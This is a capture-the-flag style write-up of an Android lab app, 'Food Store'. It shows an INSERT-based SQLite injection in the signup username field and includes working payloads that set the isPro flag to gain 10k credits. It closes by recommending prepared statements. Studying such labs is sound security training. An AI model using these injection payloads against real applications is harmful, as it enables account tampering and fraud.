MHL - Food Store

Step 0: The task

Step 1: Static Analysis

We have 3 screens: Login, Signup and Main Activity

From SignUp create user dbHelper.addUser(newUser) look Interesting.

Step 2: The bug

From LoginActivity, if we are pro user app set a 10k credits.

From DBHelper

The bug is a SQL Injection Insert Based over SQLite, uncommon injection but explotation is pretty simple

INSERT INTO users (username, password) VALUES ('my_user', 'password'MY_PAYLOAD)

Step 3: Dynamic Analysis

At this point we need to develop our payload, lucky for us this script intercept sqlite functions, create database, insert, select is covered. https://codeshare.frida.re/@ninjadiary/sqlite-database/

I download the script, and run it

There is a single point of insertion at username. password and address is encoded in base64, before saved in database.

First try

Payload in user text box

user2','cHdkMQ==', 'YWRkcmVzcyAx',1)--

Become.

INSERT INTO users (username, password, address, isPro) VALUES ('user2','cHdkMQ==', 'YWRkcmVzcyAx',1)--', 'cHdkMQ==', 'YWRkcmVzcyAx', 0)

Failing,

Second try

Payload

user2','cHdkMQ==', 'YWRkcmVzcyAx',1);--

Become

INSERT INTO users (username, password, address, isPro) VALUES ('user2','cHdkMQ==', 'YWRkcmVzcyAx',1);--', 'cHdkMQ==', 'YWRkcmVzcyAx', 0)

Final

user2 is added, and we get 10k credits. 👏

Behind the scenes, look the record in database.

The fix

Use prepared statements, for every param, android docs are good enought, https://developer.android.com/reference/java/sql/PreparedStatement